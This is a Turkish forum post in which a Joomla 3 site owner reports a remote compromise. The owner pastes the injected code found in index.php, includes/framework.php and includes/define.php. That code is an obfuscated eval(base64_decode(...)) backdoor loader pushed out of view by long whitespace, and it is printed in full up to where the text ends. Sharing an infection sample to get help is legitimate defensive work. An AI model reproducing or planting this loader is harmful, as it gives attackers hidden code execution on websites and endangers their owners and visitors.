Joomla Güvenlik Sorunu

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Daft Ground
    PLaXToR
    PLaXToR's avatar
    Kayıt Tarihi: 08/Temmuz/2003
    Erkek

    Selamlar,

    Joomla 3 serisinde uzaktan bir şekilde sisteme sızılıp şu kod index.php ve includes/framework.php ve includes/define.php ye ekleniyor.

    -----

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGxteGZobXB5Y3QgPSA3NzI3OyBmdW5jdGlvbiBydHRkZigkb2VlYmNoc3QsICR1bXBrail7JGJleW5vbXUgPSAnJzsgZm9yKCRpPTA7ICRpIDwgc3RybGVuKCRvZWViY2hzdCk7ICRpKyspeyRiZXlub211IC49IGlzc2V0KCR1bXBralskb2VlYmNoc3RbJGldXSkgPyAkdW1wa2pbJG9lZWJjaHN0WyRpXV0gOiAkb2VlYmNoc3RbJGldO30KJHlydmRvcWZ3PSJiYXNlIiAuICI2NF9kZWNvZGUiO3JldHVybiAkeXJ2ZG9xZncoJGJleW5vbXUpO30KJGxzcXVsaHRibiA9ICc4RVBCMkExaHdKOE5VUkEzSEwxM0pSVDZ3M0hhb1hxQXlYY25DY3JHOEVQQjJBMWh3SjhOVVJUNndRMVBIZ1U2SGdWZ0lkWWNHeWFpZHh0bicuCicwTFBNSFJBckdkT212SmJNd0piUHZXQXIyNzFCSldTbjA3dWdJZFljR3lhaWR4dFBIZ1U2SFAxM3dKdDZIZycuCidTbjBMSE5WZHhmNThuWUhSQXJKV1NuMDdBTTBFUG0ySjhOVmR4ZjU4TmlkRHJHMjd2Tm83U1B3TFBCdzc4Tm9QdCcuCidvdTQxNHlyY2xHOXhpZGdhaWRsWURvZHR4dzd3bjBMdU5vUHRvdTQxNHlyY2xJZFlsSkVqbEd5YWlkZ3JpZERyRzI3dk5vN1NQd0xQQnc3OE5veFNVdXhBNUFYMTknLgonN0ExeVNBdHR1eDR1eVFvbEc5eGlkZ2FpZGxZRG9kdHh3N3duMEx1Tm94U1V1eEE1QVgxOTdBMXlTQXR0dXg0dXlRb2xJZFlsSTNvbkMnLgonY3JHTThyRzU4bm53bFlObzdTUHdMUEJ3NzhOVXI0VnV4QXRTNFBNdVBBQ0poWHJpRVZqaVJpTGl6b2h2TFhqVkw0YndMeFJDRlVudjdvVGlMNHIyN1pUJy4KJ0NkSG5HOHJHa2NyR29kWURvRVNQd0xQQnc5RGc4dVQ5U3U0WDdBMTlBdXFNVnk4cnZoRFd2UnZSVnppbHZ5RDN2NzRMMnl2akhMUGJ2elhSdkpTbjBoWCcuCidqVTNjRFY5eGY1OE5pZGxZRG9kWXh3RTRydjlZMW9YcUF5WGNmNThORG9kWURVRVNiT0U0TTJSQXFvNXJEeVBBVnk1YWlkRHJHb2RZRG9kU0Z5WDFkOHVUeTczT3pIUTFiJy4KJ09KU05VUXJEZTlZZ3d5dGx3NXZSQ0VYbUM1b2N3bHJydmhEV0l5UFBDN29tVlJ3bHdFVmpWNWJ6VmhYY1VoYWlkbFknLgonRG9kdGcwRTFsdjdjRFVFaWhKUjRRT0VEZjU4TmlkRHJHb2RZRG9Fd1EwTGlyMjcxQm9FaWhKck9QT1hiNkhXOE5HOHJHb2RZRG9GYWlkbFlEb2RZRG9kWURIJy4KJ0xBck9KVUJvRmlySGdTNjBFMVd3Sm9OSEZVUHdRMTN3SnRhdjdpUEdkSDZKbGJXT1dPWicuCid3Z1NjR0FjQklSeGdJZEhnSVhZeEpRaTR1UHc0dVBhZzk0U3V1NDFveVFpdVVRcm5HeWFpZGxZRG9kdDE1OE5pZGxZRCcuCidvZHRMTzdxek9FUDYwbHR6SFExRndKU0pITFBydjdVYXd1U25IZ1ZORzhyR29kWURvRmFpZGxZRG9kWURvZFlEVUZVUEgzWTFvWDQzSEw0cUdkeGY1OE5pZGwnLgonWURvZFlEb2RZRFVFNEJ2N1RxSFdQaEpXNFF3SkFQbzVyRDhKVTN2SnhOR3lhaWREckdvZFlEb2RZRG9kWXh2N3FiMEZQaGtKaU1ISkFQTzdBMEo5WTFvRWloSnJPUE9YUycuCic2dlFVNjBXOE5HeWFpZERyR29kWURvZFlEb2RZeEhSQWF3UDFjdkpTTm81ckRVNDF5U0FVN1NBVTBVUWk1dXhQOEE0MUU5dVQ0eXg0aVM5T09DY3JHb2RZRG9kWUQnLgonb2R0VzJFUGF3OVlOR2RTaDBFNGgyZFkxb0ZpckhnVWMwV1ZOVUZpUDBFd01IRTRyMmRjRFNYUDlTdWl1eVFVd0pRaTR1WDQ5OCcuCidBU2V1bHhub2RYMWU5dEU4dVR5Uzl4aWRsWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZFlEVUZpUDBFd01IRScuCic0cjJkWTFvRmlRdmdpckhsRHhIUkFhd1AxY3ZKU05JZFljSWRZeEhSVGJIUkRuQ2NyRzU4TkRvZFlEbycuCidkWURvZFlEb2R0bndsWU5VRmlQMEV3TUhFNHIyZFkxZTl0ekhRMUZ3SlNYMFJpOTBSMXJHZHhuNThORG9kWURvZFlEb2RZRG9kdCcuCidmNThORG9kWURvZFlEb2RZRG9kWURvZFlEdmdVUHY3YWY1OE5Eb2RZRG9kWURvZFlEb2R0MTU4TmlkbFlEb2RZRG9kWScuCidEb2RZRG9FUExvZGJoT0ZVYXc3ak5VRmlQMEV3TUhFNHIyZHhuNThORG9kWURvZFlEb2RZRG9kdGY1OE5Eb2RZRG9kWURvZFlEbycuCidkWURvZFlEVUU0QnY3VHFIV1BoSlc0UXdKQVA3UXJEZTlZeEhSQWF3UDFjdkpTTkNjckdvZFlEb2RZRG9kWURvZFlETThyR29kWUQnLgonb2RZRG9kdDE1OE5pZGxZRG9kWURvZFlEd0wxM3c3NHoyZFlOVUU0QnY3VHFIV1BoSlc0UXdKQVBvRTRob2RTek9KVTN3N3FySlJTbkhseGlkbFlEb2RZRG8nLgonZFlEa2NyR29kWURvZFlEb2RZRG9kWUQyN3ZER2Q0bjBQMWJIZ1ViazlEeHZXQTNITEFCTzQxeDJKb2FvJy4KJ2RTM3dKVm5HOHJHb2RZRG9kWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZFlEb2RZRG9kUzN3SlZEZTl0Jy4KJ2JIZ1Via0ExbXdKVWd3OUR4SExBaElkdHpIUTFGd0pTWDJKVVB2V1M2SGdQVjJKaXJHZFN6T0pVM3c3Jy4KJ3FySlJTbkhseG5DY3JHb2RZRG9kWURvZFlEb2RZRE04ckdvZFlEb2RZRG9kdDE1OE5pZGxZRG9kJy4KJ1lEb2RZREhMQXJPSlVCb0VpaEpyaU53N2lwQVdVbk9FNGwwRXVOdkpVM3ZKUE1PN3FuSEpBJy4KJ1BHZFMzd0pWbkd5YWlkbFlEb2R0MTU4TmlkbFlEb2R0TE83cXpPRVA2MGx0ekhRMTUyRUF6MlFPJy4KJzMySlNidkxUUEdkU3gySlVNMEVQaE9keGlkbFlEb2R0ZjU4TkRvZFlEb2RZRG9kU3gySlVNMEVQaE80MVdITFBydjdVYXcnLgonOVkxb1g0M0hMNHFHZHhmNThOaWRsWURvZFlEb2RZRHdMMTN3NzR6MmRZTlVFU25IUDFhMkppcm9FNGhvZFN4MkpvbjU4TkRvZFlEb2RZRG9GYWlkbCcuCidZRG9kWURvZFlEb2RZRG9FUExvZGJZMkppTU9XVW5PRTRsMEV1TlVFU25IbHhEVWx2RDJKaU13RVAzR2RTeDJKb25HOHJHb2RZRG9kWUQnLgonb2RZRG9kWURrY3JHb2RZRG9kWURvZFlEb2RZRG9kWURvZFN4MkpVTTBFUGhPNDFXSExQcnY3VWF3QW1PbzVyRFVFU25IemFpZGxZRG9kWURvZFlEb2RZRCcuCidvRnJpZGxZRG9kWURvZFlETThyRzU4TkRvZFlEb2RZRG9GVVBPRkEzMGxZeHdFUDNKUlRuSFdTTU9XJy4KJ1VuT0U0bDBFdWY1OE5Eb2RZRE04ckc1OE5Eb2RZRHdnQUJ2V1NuMFJqRHZXaU1TUkFyU0VQM3c3aXIwV1VxeUVQaE9kRHh3RVAzSWRZeHdFQWNPRUQxVnlZbjU4TkRvJy4KJ2RZRGtjckdvZFlEb2RZRG9kWXhITEFoTzdUcm81ckR2SlUzdkp4Tkd5YWlkRHJHb2RZRG9kWURvZHRud2xZTm83UGhKUlNuSGxEeCcuCid3RVAzRzl4aWRsWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZFlESExBck9KVUJvZFMzd0ppUTBGOGY1OE5Eb2RZRG9kWURvRnJpZERyR29kWURvZFlEb2RZeEgnLgonTEFoTzdUcjdRckRlOVl4d0VQM0NjckdvZFlEb2RZRG9kWXh3RVAzSlJpNk83cXJvNXJEVjVhaWREckdvZFlEbycuCidkWURvZHRud2xZTlVFU1BIRlNObzVjRFY5eGlkbFlEb2RZRG9kWURrY3JHb2RZRG9kWURvZFlEb2RZREhMQXJPSlVCb2RTM3dKaVEwRjhmNThORG9kJy4KJ1lEb2RZRG9GcmlkRHJHb2RZRG9kWURvZFl4d0VQM281ckRIV1MzMEVBQkdkU3gySm9ubzVyMW81WERlM1l4d0VQM281TkRIZ1MzMjdyTlVFJy4KJ1NuSGxjRFVRVEhJM0huQ2NyR29kWURvZFlEb2RZeDJkWTFvWHQ2SEVBQndFUDNHZFN4MkpvbkNjckdvZFlEb2RZRG9kdG53bFlOVUUnLgonRERleXIxb1h3dHk0aTRHOHJHb2RZRG9kWURvZHRmNThORG9kWURvZFlEb2RZRG9kdDN3SlNRSExqRCcuCidVRlVQSFdBYU81YWlkbFlEb2RZRG9kWURNOHJHNThORG9kWURvZFlEb0ZPTjI3VFBvZEROVUV2RGU5dDN3NzR4d0VQM0dkU05HOXhEb3lyMW9Yd3R5NGk0RzgnLgonckdvZFlEb2RZRG9kdGY1OE5Eb2RZRG9kWURvZFlEb2R0bndsWU5VRXZEb3lyMW9kSEJVM3RiMEw4RFVFdkRveXIxb2RIQklsSG41OE5Eb2RZRG9kWURvZFlEbycuCidkdGY1OE5Eb2RZRG9kWURvZFlEb2RZRG9kWURVRWlRSGdVUDBnU013RVAzbzVyRG9sU3gySm82VUV2bENjckdvZFlEb2RZRG9kWUQnLgonb2RZRG9kWURvRVBMb2RibkhRMXgySm9OVUVpUUhnVVAwZ1NNd0VQM0c5eGlkbFlEb2RZRG9kWURvZFlEb2RZRG9kdGY1OE5EJy4KJ29kWURvZFlEb2RZRG9kWURvZFlEb2RZRG9kU3gySlVNdlIxUTBnOERHaHJEVnlhaWREckdvZFlEb2RZRG9kWURvZFlEb2RZRCcuCidvZFlEb2RZeEhMQWhPN1RyN1FyRGU5WXh2V0EzSExBQk80MXgySm9mNThORG9kWURvZFlEb2QnLgonWURvZFlEb2RZRG9kWURvZFMzd0ppUTBGOERlOXRiSGdVYmtBMW13SlVndzlEeEhMQWhPN1RySWR0Jy4KJ3pIUTFGd0pTWDJKVVB2V1M2SGdQVjJKaXJHZFN6T0pVM3c3cXJKUlNuSGxjRFVFU1BIRlNOb2RaRFZ5WW5HeWFpZGxZRG9kWURvZFlEb2RZRG9kWURvZHQxNThOJy4KJ0RvZFlEb2RZRG9kWURvZHQxNThORG9kWURvZFlEb0ZyaWREckdvZFlEb2RZRG9kdHowRTFodzdTbkhsRHgyZHhmNThOaWRsWURvZFlEb2RZREhMQXJPSlUnLgonQm9kUzN3SmlRMEY4ZjU4TkRvZFlETThyRzU4TkRvZFlEd2dBQnZXU24wUmpEdldpTVNSQXJTRTF6dUwxNk9kRCcuCiduNThORG9kWURrY3JHb2RZRG9kWURvZFl4d0UxekhMMTZPNDFQMEw4RGU5dGhPRlUzSEUxaEdkU011ckE5QXhBOTczT3k4UVUnLgonVXU0U01TeFBWU3VxdHl1dWdKOWNEVTQxeVNBVTdTQVUwVVFVNHVBQTR1UVNNQUFVVVVRcm5DY3JHb2RZRG9kWURvZHRudycuCidsWU5VRVM2dldVNjBXU013N3F4bzVyMWU5dEU4dVR5Uzl4aWRsWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZCcuCidZREhMQXJPSlVCb2RTTXVyQTlBeEE5NzNPWHlyaUF5dUFDQTQxOXlyMXVVUXJmNThORG9kWURvZFlEb0ZyaWRsWURvZFlEb2RZRHc3VGh3N1AnLgonTG9kRHh3RTF6SEwxNk80MVAwTDhEZXlyMW81WW41OE5Eb2RZRG9kWURvRmFpZGxZRG9kWURvZFlEb2RZRG9GVVBPRkEzMGxZbEkzb2Y1OE5Eb2RZJy4KJ0RvZFlEb0ZyaWRsWURvZFlEb2RZRHc3VGh3OHJHb2RZRG9kWURvZHRmNThORG9kWURvZFlEb2RZRG9kdDN3SlNRSExqREhXQWxIV1MzR2RTJy4KJ011ckE5QXhBOTczT3k4UVVVdTRTTVN4UFZTdXF0eXV1Z0o5Y0RWZGNEVUVTNnZXVTYwV1NNdzdxeEd5YWlkbFlEb2RZRG9kWURNOHJHb2RZRG8nLgonRnJpZERyR29kWURvRVBMb2REYndnQUJ2V1NuMFJxTXdKYm5IV1NoR2RPTDI3VFBKV3RRTzQxejBScXJ3N3FySDNIbkc4ckdvZFlEb0ZhaWRsWURvZFlEb2RZRCcuCid3Z0FCdldTbjBSakR3TFBhd0ExY09KU012UjFCT0VBQk9GVk5VRWphb2RTeElkWXh3TFRidzNZMW9Yd2IwRmlQRzhyR29kWURvZFlEb2R0ZjU4TkRvZFlEb2RZRG9kWUQnLgonb2RZeDA3MXh3OVkxb2RTTDBFNGdvNXIxbzVERGUzWWd2OUhEQ2xZZ08zSGY1OE5Eb2RZJy4KJ0RvZFlEb2RZRG9kWXh3bFkxb1h0TDBXdFAwbER4MGxjRFVFUTZ3RXVuQ2NyR29kWURvZFlEb2RZRG9kWUQyN3ZER2RTTG81cjFlOXRFdjdUaHc5eGlkJy4KJ2xZRG9kWURvZFlEb2RZRG9GYWlkbFlEb2RZRG9kWURvZFlEb2RZRG9kdDN3SlNRSExqRFY1YWlkbFlEb2RZRG9kWURvZFknLgonRG9GcmlkbFlEb2RZRG9kWURvZFlEb0VBYUhSdWlkbFlEb2RZRG9kWURvZFlEb0ZhaWRsWURvZFlEb2RZRG9kWURvZFlEb2R0bndsWU4ySicuCidpTXZKVTN2SnhOVUU4bkc5WXh3ZFkxb0VQbUhFVDZ3RXVOVUU4bkNjckdvZFlEb2RZRG9kWURvZFlEb2RZRG9kU2xrSlNQSFExV0hMUHJPRUFCbzVyRHdnTzMySlNQR2RTJy4KJ0xJZFl4d2R4ZjU4TkRvZFlEb2RZRG9kWURvZFlEb2RZRHdMaWEwV2lQR2RTTEd5YWlkbFlEb2RZRG9kWURvZFlEb2RZRCcuCidvZHQzd0pTUUhMakRVRVVxT0VBaEpXTzMySlNydzdqZjU4TkRvZFlEb2RZRG9kWURvZHQxNThORG9kWURvZFlEb0ZyaWQnLgonbFlEb2R0MTU4TmlkbFlEb2R0bndsWU5vN3dRMExpcjI3MUJKUkFqMkppckgzRGd3TFBhd0ExZ3dKU012UjFCJy4KJ09FQUJPRlZnRzl4aWRsWURvZHRmNThORG9kWURvZFlEb0V3UTBMaXIyNzFCb0V3bjBFQU13UkFySlInLgonaTYwZ1NQMGdTaEdkU0wyN1RQMEw0bXc5eGlkbFlEb2RZRG9kWURrY3JHb2RZRG9kWURvZFlEJy4KJ29kWURVRXdOdjdxeDBFdURlOXRMMFd0UDBsRHh3TFBhdzdxYjA3dWFvZFUzb2x4ZjU4TkRvZFlEb2RZRCcuCidvZFlEb2RZeHdMaTYwZ1NQMGdTaG81ckR3Z1VQdjc4TlVFd052N3F4MEV1YW9Fd24wRUFoMkpuUEdkU0wyNycuCidUUDBMNG13OXhuQ2NyR29kWURvZFlEb2RZRG9kWUR3TGlhMFdpUEdkU0wyRTRCd0VUUEd5YWlkRHJHb2RZRG9kWURvJy4KJ2RZRG9kWURITEFyT0pVQm9kU0x2UjFCT0VBQk9GVmY1OE5Eb2RZRG9kWURvRnJpZGxZRG9kdDE1OE5pJy4KJ2REckdvZFlEb0V3UTBMaXIyNzFCb0VpaEpSU1B2V1VxSEZTTUhFYmJIUnVOVUVTYk9FWGFvZFNwd0p4bicuCic1OE5Eb2RZRGtjckdvZFlEb2RZRG9kWXgwV0FySlJTYk9FWERlOVlsb3phaWREckdvZFlEb2RZRG9kdEwnLgonMFdvREdkU25leVlmb2RTbmVGaXJITFRQMGxEeHdFNHJ2OXhmRzhyR29kWURvZFlEb2R0ZjU4TkRvZFlEb2RZRG9kWURvZHRMMFdvREdkU0snLgonZXlZZm9kU0tlRmlySExUUDBsRHgyUkFxRzlZTFVsWXgyeVRoT0ZVYXc3ak5VRVNiT0VYbkMzWXgybGFwSWRZeDI5YXBHOHJHb2RZRCcuCidvZFlEb2RZRG9kWURrY3JHb2RZRG9kWURvZFlEb2RZRG9kWURvZFM2T0pTTXdFNHJ2OVlCZTl0ejJGb04wV1V4R2RTeHZKU2I3M1NuSjl4REpsdDZITDhOVUVtUGtBYXgyJy4KJ1Bybkd5YWlkbFlEb2RZRG9kWURvZFlEb0ZyaWRsWURvZFlEb2RZRE04ckc1OE5Eb2RZRG9kWURvRlVQT0ZBMzBsWXgwV0FySlJTYk9FWGY1OE4nLgonRG9kWURNOHJHNThORG9kWUR3Z0FCdldTbjBSakR2V2lNd0VBekhnUGNPZER4d0U0cnY5Y0RVRW1QaycuCic5eGlkbFlEb2R0ZjU4TkRvZFlEb2RZRG9FT2EwUlViMGRZeHZXaU12SkFyMjVhaWREckdvJy4KJ2RZRG9kWURvZHQzd0pTUUhMakR2V2lNd0VBekhnUGNPNDFjMkU0aHc5YnpIUTF4dzdpM2tKdHJKV3ROdkppUEdkU3h2SlNiSWRZeDInLgonUkFxRzljRFVFaWhKUjRRT0VEbkNjckdvZFlEb0ZyaWRsWURvZHRMTzdxek9FUDYwbHR6SFExUDBMaTNrSnRyR2RTeHZKU2JJZFl4MlJBcUc4ckdvZFlEb0ZhaWRsWURvZFlEJy4KJ29kWUR3UlQ2dkw0YW9kU3pIUTFiT0pTTkNjckc1OE5Eb2RZRG9kWURvRlVQT0ZBMzBsdHpIUTF4dzdpM2tKdHJKV3ROdkppUEdFaWhKUlNQdldVcUhGU01IRWJiJy4KJ0hSdU5VRVNiT0VYYW9kU3pIUTFiT0pTTkc5Y0RVRW1Qazl4ZjU4TkRvZFlETThyRzU4TkRvZFlEd2dBQnZXU24wUmpEdldpTXdMUGF3QTEzdycuCic3NHhHZFNjdkpTTkc4ckdvZFlEb0ZhaWRsWURvZFlEb2RZRFVFU2JPRVhEZTl0WXdMUGF3QTFnd0pTTXZSMUJPRUFCT0ZWTlVGdGJPRURuQ2NyRzU4TkRvZFlEb2RZRG9GVVAnLgonT0ZBMzBsWXh3RTRydnlhaWRsWURvZHQxNThOaWRsWURvZHRMTzdxek9FUDYwbHR6SFExTDI3VFBKV08zMkpTUEdkUycuCidjdkpTTklkWXh3RTRydjl4aWRsWURvZHRmNThORG9kWURvZFlEb1h0TDI3VFBKV3RRTzQxejBScXJ3N3FySDNEeEhFNHIyZGNEVUVTYk9FWCcuCiduQ2NyR29kWURvRnJpZERyR29kWURvRXdRMExpcjI3MUJvRWloSlJ3bjBFQU12SnRjdzdxeEdkU2N2SlNOSWRZeHdFNHJ2OXhpZGxZJy4KJ0RvZHRmNThORG9kWURvZFlEb1h0TDI3VFBKV3RRTzQxejBScXJ3N3FySDNEeEhFNHIyZGNEVUVTYk9FWGFvNURuQ2NyR29kWUQnLgonb0ZyaWREckdvZFlEb0V3UTBMaXIyNzFCb0VpaEpXaTZIZ1NNdlIxbUhFNDN3Sm9OVUVYYW9kU2xHOHJHb2RZRG9GYWlkbFlEb2RZRG9kWURIJy4KJ0xBck9KVUJvRmlySExUUDBsRHh2OXhESTl0aE9GVWF3N2pOVUVvbkNjckdvZFlEb0ZyaWREckcnLgonb2RZRG9Fd1EwTGlyMjcxQm9FaWhKck9QT1hpNjA3UTYwUGlyMFdVYndSdU5VRVNuSGdWMXlQQScuCidWeWR4aWRsWURvZHRmNThORG9kWURvZFlEb2RTaHc3VExKUlNuSGxZMW9FU25ITHFiMDd1TkpRMUU5dVQ0SlFabkMnLgonY3JHNThORG9kWURvZFlEb2RTejBSUW0wUnFNMEw0bXdKVkRlOXR0SGdVYms5RGwwV3RyMjcxQkgzb2FvZFVSMjdBV0gzb2FvZFVjdjdPJy4KJ1BIM29hb2RVaHdKaWgyNzFCSDNvYW9kVWhPRTRySDNvYW9kVVFIUkEzSDNvYW9kVWJIZ1NudlJUUEgzb2FvZFV4TzdRY29sY0RvTGJQdjdTUEhnVmwnLgonSWRZbDBFUGxIM29uQ2NyRzU4TkRvZFlEb2RZRG9kU3IwSnRNd0VQM281ckRVRmlQMEV3TXdFUDNvZGpEb2xabG9kakRVRWk2MDdRJy4KJzYwUDFCdjdRUEhRbWhPRlVhdzdqTnZXaU1TUkFyOUUxaE9kRG5HOVlQb0VpNk83cXJHZFN6MFJRbTBScU0wTDRtd0pWbkp5YWlkRHJHb2RZRG9kJy4KJ1lEb2R0bndsWU53TFBhd0ExUGtFUGhPRlZOVUZTbUg0MXgySm9uRzhyR29kWURvZFlEb2R0ZjU4TkRvZFlEb2RZRG9kWURvZHQzd0pTUUhMakRVRlNtSDQxeDJKb2Y1Jy4KJzhORG9kWURvZFlEb0ZyaWREckdvZFlEb2RZRG9kdG53bGJtMlJTbkhsRHhPRVFjSlJTbkhseG41OE5Eb2RZRG9kWURvRmFpZGxZRG9kWURvZFlEb2RZRG9GVVBPRkEzMGxZJy4KJ3hPRVFjSlJTbkh6YWlkbFlEb2RZRG9kWURNOHJHNThORG9kWURvZFlEb0ZVUE9GQTMwbFlsb3phaWRsWURvZHQxJy4KJzU4TmlkbFlEb2R0TE83cXpPRVA2MGx0ekhRMWMwRkFnMjdxTXY3U3hHZFNCdjdRUElkWXh2TDRod3l2ckpSU2JPRVhuNThORG9kWURrY3JHb2RZRG9kWURvZFknLgoneHdFNHJ2OVkxb0VVYkhSdVJpNDF4dzdpNndFdU5VRVViSFJ1Umk0MXh2SlNiR3lhaWREckdvZFlEb2RZRG9kWXhIV1M2SEw0Z3dBMWN2SlNObzVyRHZXaU0nLgonU1JBcjhSMW0wNzFCdVdTNkhMNGd3OURub2RqRG9sWmxDY3JHb2RZRG9kWURvZFl4SFdTNkhMNGd3QTFjdkpTTm81ckRVRmlyMFdVYndSQU1IRTRyMmRZQm9GaVF2Z2lyJy4KJ0hsYm13NXVOb0xpYnZSYlBvbHhhbzVZYW81dW5vZGpEb1BabG9kakQwNzhRR2RTQnY3UVBvZGpEdldpTScuCidTUkFyOUUxaE9kRG5HeWFpZERyRzU4TkRvZFlEb2RZRG9FaWhKUnduMEVBTU9XVW5PRXVOVUZpcjBXVWJ3UkEnLgonTUhFNHIyZGNEdldpTXc3cXpIZ1BjT2REeHdFNHJ2OWNEdldpTVNSQXI5RTFoT2REbkc5eGY1OE5Eb2RZRE04ckc1OE5Eb2RZRHdnQUJ2V1MnLgonbjBSakR2V2lNSEVUUXdSUEJKV1VQMDlEeDBMNG13OXhpZGxZRG9kdGY1OE5Eb2RZRG9kWURvZFNoT0UxM3Y3T1BKV3RiT0VERGU5dHpIUTFGd0pTNTBSUW0wUnF5T0UnLgonMTN2N09QR2R4Qm9kbzZvemFpZGxZRG9kWURvZFlEVUZpcjBXVWJ3UkFNSEU0cjJkWTFvZFNoT0UxM3Y3T1BKV3RiT0VERElsdGhPN1VoT0ZvTjA3OCcuCidRR2RVenY3aU53OW9uSWRZY0lkWVFHOVlCb2RVTW9sWUJvRVF4aTlEeDBMNG13OVlCb0VpaEpyT1BPWCcuCidiNkhXOE5HOXhmNThOaWRsWURvZFlEb2RZRDI3dkRHRXduMEVBTXdKYm5IV1NoR2RTaE9FMTN2N09QSld0Yk9FRG5HOHJHb2RZRG9kWURvJy4KJ2R0ZjU4TkRvZFlEb2RZRG9kWURvZHRZTzdxYTI3cXBHZFNoT0UxM3Y3T1BKV3RiT0VEbkNjckdvZFlEb2RZRG9kdDE1OE5Eb2RZRE04ckc1OE5Eb2RZRHdnQUJ2V1NuMFJqRHYnLgonV2lNSEVUUXdSUEJKUlQ2djc4TlVFcWIwN3UxeVBBVnlkeGlkbFlEb2R0ZjU4TkRvZFlEb2RZRG9kU2hPJy4KJ0UxM3Y3T1BKV3RiT0VERGU5dHpIUTFGd0pTNTBSUW0wUnF5T0UxM3Y3T1BHZHhmNThOaWRsWURvZFlEb2RZRCcuCicyN3ZER0VQaEpSU25IbER4SFdTNkhMNGd3QTFjdkpTTkc5eGlkbFlEb2RZRG9kWURrY3JHb2RZRG9kWURvZFlEb2RZRDI3Jy4KJ3ZER2RTQnY3UVBvNXIxb1hxQXlYY25vZFo2b0VUNnY3OER2N1Rhb0Z0YU83T24wZ1ZpZGwnLgonWURvZFlEb2RZRG9kWURvRmFpZGxZRG9kWURvZFlEb2RZRG9kWURvZHRMMFdVUHY3aU5vZGJodlI0QndFUDNHZFNoT0UxM3Y3T1BKV3RiT0VEbm9FNGhvZFNwd0p4MWVsU2MnLgonMEZBZzI3cU0wTDRtdzl4aWRsWURvZFlEb2RZRG9kWURvZFlEb2R0ZjU4TkRvZFlEb2RZRG9kWURvZFlEb2RZRG9kWURvRVBMb2RiaE8nLgonRlVjMFdWTlVGdGFPN09uMFAxQnY3UVBJZHRoTzdVaE9Gb04wNzhRR2RVenY3aU53OW8nLgonbklkWWNJZFlRRzl4RG95cjFvWHdiMEZpUEc4ckdvZFlEb2RZRG9kWURvZFlEb2RZRG9kWUQnLgonb2R0ZjU4TkRvZFlEb2RZRG9kWURvZFlEb2RZRG9kWURvZFlEb2R0WXdKd2IwZGJ6SFExeHc3aTNrSnRyR0VpaEpSJy4KJ3duMEVBTUhMQWJ3ZER4SFdTNkhMNGd3QTFjdkpTTm9kakRvbFpsb2RqRFVGdGFPN09uMFAxQnY3UVBHOWNEdldpTVNSQXI5RTFoT2REbkc5eGY1OE5Eb2RZRG9kWURvJy4KJ2RZRG9kWURvZFlEb2RZRG9GcmlkbFlEb2RZRG9kWURvZFlEb2RZRG9kdDE1OE5Eb2RZRG9kJy4KJ1lEb2RZRG9kdDE1OE5Eb2RZRG9kWURvZFlEb2R0UDBGaVA1OE5Eb2RZRG9kWURvZFlEb2R0ZjU4TkRvZFlEb2RZRG9kWURvZFlEb2RZRFVGaXIwV1UnLgonYndSQU1IRTRyMmRZMW9kU2hPRTEzdjdPUEpXdGJPRURESWxZbEkzb0RJbHRoTzdVaE9Gb04wNzhRR2RVenY3aU53OW9uSWRZY0lkJy4KJ1lRRzlZQm9kVU1vbFlCb0VReGk5RHgwTDRtdzlZQm9FaWhKck9QT1hiNkhXOE5HOXhmNThOaWRsWURvZFlEb2RZRCcuCidvZFlEb2RZRG9kdG53bFlOd0xQYXdBMVBrRVBoT0ZWTlVGaXIwV1Vid1JBTUhFNHIyZHgnLgonbjU4TkRvZFlEb2RZRG9kWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZFlEb2RZRG9kWURvZHRZd0p3YjBkYnpIUTF4dzdpM2tKdHInLgonR0VpaEpSd24wRUFNSExBYndkRHhIV1M2SEw0Z3dBMWN2SlNORzljRHZXaU1TUkFyOUUxaE9kRG5HOXhmNThORG9kWURvZFlEb2RZRG9kWURvZFlETThyR29kWURvZFlEb2RZJy4KJ0RvZFlETThyR29kWURvZFlEb2R0MTU4TkRvZFlETThyRzU4TkRvZFlEd2dBQnZXU24wUmpEdldpTU9XVW5PRTRsMEVBTXZSYlB2UmFORzhyR29kWScuCidEb0ZhaWRsWURvZFlEb2RZRDI3dkRHRmlySExUUDBsYnpIUTFGd0pTNTBSUW0wUnF5T0UxM3Y3T1BHZHhub2RYMW81WW41OE5Eb2RZRCcuCidvZFlEb0ZhaWRsWURvZFlEb2RZRG9kWURvRlVQT0ZBMzBsdHVIZ0FQQ2NyR29kWURvZFlEb2R0MTU4TkRvZFlEb2QnLgonWURvRUFhSFJ1aWRsWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZFlESExBck9KVUJvWHdiMEZpUENjckdvZFlEb2RZRG9kdDE1OE5EbycuCidkWURNOHJHNThORG9kWUR3TDEzdzc0ejJkWU5VNDE1eXIxSTl1dUR2SlZEVUVtUGt5citVRndiMEZBUEc4ckdvZFlEb0ZhaWRsWURvZFlEb2RZRFVFU2JPRVhEZTlZeE9MNGEnLgonTzd1ZjU4TkRvZFlEb2RZRG9kU3h2SlNiSlJtUGs5WTFvZFNwd0p4ZjU4TkRvZFlETThyRzU4TkRvZFlEMjd2REdkWHh3RTRydjl4aWRsWURvZHRmNThORG9kWURvZCcuCidZRG9FdzZITEFidlJEREdkU011WDF5QWR0YkgzWXgyUkFxZXlqeE9MNGFPN3VuNThORG9kWURvZFlEb0ZhaWRsWURvZFlEb2RZRG9kWURvZFN4dkonLgonU2JvNXJEVUZ3YjBGQVBDY3JHb2RZRG9kWURvZFlEb2RZRFVFU2JPRTRNMlJBcW81ckRVRW1QJy4KJ2t5YWlkbFlEb2RZRG9kWURNOHJHb2RZRG9GcmlkRHJHb2RZRG9kU3h2SlNibzVyRDhGQUJIUkEzMjc0YTJKblBHRWloSlJTUHZXVXFIRjhOdkw0aHd5dnInLgonSlJTUHZSMXh3OUR4d0U0cnY5eGFvZFN4dkpTYkpSbVBrOXhuQ2NyRzU4TkRvZFlEMjd2REcnLgonRVBoSFJBckdkU3h2SlNiNzNPYjIzT09HOVlMVWxZeHZXaU12S